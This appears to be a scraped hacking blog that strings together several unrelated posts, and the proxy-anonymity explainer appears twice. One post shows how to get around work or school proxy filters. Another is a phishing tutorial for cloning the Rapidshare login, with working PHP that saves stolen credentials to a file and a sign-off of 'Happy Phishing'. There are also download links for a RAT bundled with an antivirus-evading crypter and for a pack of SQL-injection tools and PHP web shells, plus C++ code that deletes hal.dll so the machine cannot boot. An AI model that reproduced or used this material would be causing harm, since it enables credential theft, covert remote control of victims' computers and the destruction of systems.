Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.
Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to find a web host that supports one of the two languages, a good site that I found while searching for those terms might be freewebspace.net
1. phpproxy
Download phpproxy and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.
You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess
The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
[eminimall]
2. cgiproxy
Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.
First, download the source and unpack it to a local directory.
Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.
After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like whatismyip.com as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)
3. What is being blocked ?
a) If you can access the proxy from the client they only block domains / ips.
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.
Saturday, October 16, 2010
How does Proxy Server Works ?
This is the First Question that arises in our mind when we use the Proxy Servers for Surfing the Internet without revealing our Identity to Others. Here all these mindboggling questions are answered with easy to understand examples.
The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.
What your browser transmits to a web-server:
* name and a version of an operating system
* name and a version of a browser
* configuration of a browser (display resolution, color depth, java / javascript support, …)
* IP-address of a client
* Other information
The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
* country where you are from
* city
* your provider?s name and e-mail
* your physical address
Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).
These are some environment variables:
REMOTE_ADDR ? IP address of a client
HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.
HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.
HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)
HTTP_USER_AGENT ? so called “a user?s agent”. For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.
HTTP_HOST ? is a web server?s name
This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.
[eminimall]
These are examples of variable values:
REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5
Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.
If a proxy server is not used, then environment variables look in the following way:
REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined
According to how environment variables “hided” by proxy servers, there are several types of proxies
Transparent Proxies
They do not hide information about your IP address:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP
The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers
, etc.
Anonymous Proxies
All proxy servers, that hide a client?s IP address in any way are called anonymous proxies
Simple Anonymous Proxies
These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP
These proxies are the most widespread among other anonymous proxy servers.
Distorting Proxies
As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies
These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:
REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined
That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.
Summary
Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!
The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.
What your browser transmits to a web-server:
* name and a version of an operating system
* name and a version of a browser
* configuration of a browser (display resolution, color depth, java / javascript support, …)
* IP-address of a client
* Other information
The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
* country where you are from
* city
* your provider?s name and e-mail
* your physical address
Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).
These are some environment variables:
REMOTE_ADDR ? IP address of a client
HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.
HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.
HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)
HTTP_USER_AGENT ? so called “a user?s agent”. For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.
HTTP_HOST ? is a web server?s name
This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.
[eminimall]
These are examples of variable values:
REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5
Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.
If a proxy server is not used, then environment variables look in the following way:
REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined
According to how environment variables “hided” by proxy servers, there are several types of proxies
Transparent Proxies
They do not hide information about your IP address:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP
The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers
, etc.
Anonymous Proxies
All proxy servers, that hide a client?s IP address in any way are called anonymous proxies
Simple Anonymous Proxies
These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP
These proxies are the most widespread among other anonymous proxy servers.
Distorting Proxies
As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies
These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:
REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined
That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.
Summary
Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!
How to Make A Basic Phisher
How to Make A Basic Phisher
This is a step by step tutorial on how to make a phishing page to get account information for various websites from many people. This is only how to make the page, but it is up to you to decide how you are going to get people to fall for it.
1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.
2. Go to http://www.rapidshare.com and navigate to the premium account log-in screen at the url : https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi
3. We will now begin to make our phisher. Start by right clicking on the page and click view source.
4. Select all and paste into a notepad document.
5. You should see a bunch of random html coding, but we are only interested in two words: method and action.
6. Do a search in the document for the word "method" (without quotes).
7. Your result should be something like : method="post"
8. Change the word post to the word get.
9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.
10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"
11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"
12. Save this file as index.html and create a new document on notepad.
13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.
14. Copy and paste this code into the notepad document:
CODE
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:
CODE
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
16. Save this file as next.php and open up a new notepad document.
17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("password.txt", "a");
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.
18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.
19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.
Happy Phishing Guys!!!
Turkojan 4 Premium, Fully working
Turkojan 4 Premium, Fully workingWhat is Turkojan ?
-----------------------
Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.
You can use Turkojan for manage computers,employee monitoring and child monitoring...
Features :
------------
Reverse Connection
Remote Desktop(very fast)
Webcam Streaming(very fast)
Audio Streaming
Thumbnail viewer
Remote passwords
MSN Sniffer
Remote Shell
Web-Site Blocking
Chat with server
Send fake messages
Advanced file manager
Zipping files&folders
Find files
Change remote screen resolution
Mouse manager
Information about remote computer
Clipboard manager
IE options
Running Process
Service Manager
Keyboard Manager
Online keylogger
Offline keylogger
Fun Menu
Registry manager
Invisible in Searching Files/Regedit/Msconfig
Small Server (100kb)
Also added to this pack is
JapaBrz Csharp Crypter
100% FUD
Download Code:
http://rapidshare.com/files/223329084/Turkojan_4_Premium_H4ck3rz_www.avhackers.com.rar
Top 15 Security/Hacking Tools/Utilities
Top 15 Security/Hacking Tools/Utilities1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.
http://www.insecure.org/nmap/download.html
2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-server framework.
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
http://www.nessus.org/download/
3. John the Ripper
Yes, JTR 1.7 was recently released!!!
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
http://www.openwall.com/john/
4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
http://www.cirt.net/code/nikto.shtml
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.
http://www.foundstone.com/us/resources/freetools/superscan4.zip
6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.
http://lcamtuf.coredump.cx/p0f/p0f.shtml
7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
http://www.wireshark.org/
8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.
http://yersinia.sourceforge.net/
9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
http://www.heidi.ie/eraser/download.php
10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
http://www.chiark.greenend.org.uk/~sgtatham/putty/
11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
http://www.lcpsoft.com/english/download.htm
12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
http://www.oxid.it/cain.html
13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco gold).
http://www.kismetwireless.net/download.shtml
14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.
http://www.stumbler.net/
15. hping
To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
http://www.hping.org/
SQL InjecTion and XSS TooLz
SQL InjecTion and XSS TooLz
Apache Hacking TooLz Directory:
Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script
Remote File Inclusion And Remote Command Execution Directory :
IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter
Databases & SQL Injection & XSS TooLz Directory
Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL
PHP Shells
**** v2.0
c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView
Download:
http://rapidshare.com/files/118413996/SQL_InjecTion___XSS_TooLz.zip
password: dell23warez.info
A Deadly C++ Virus
A Deadly C++ Virus
This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.
The Original Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
Subscribe to:
Posts (Atom)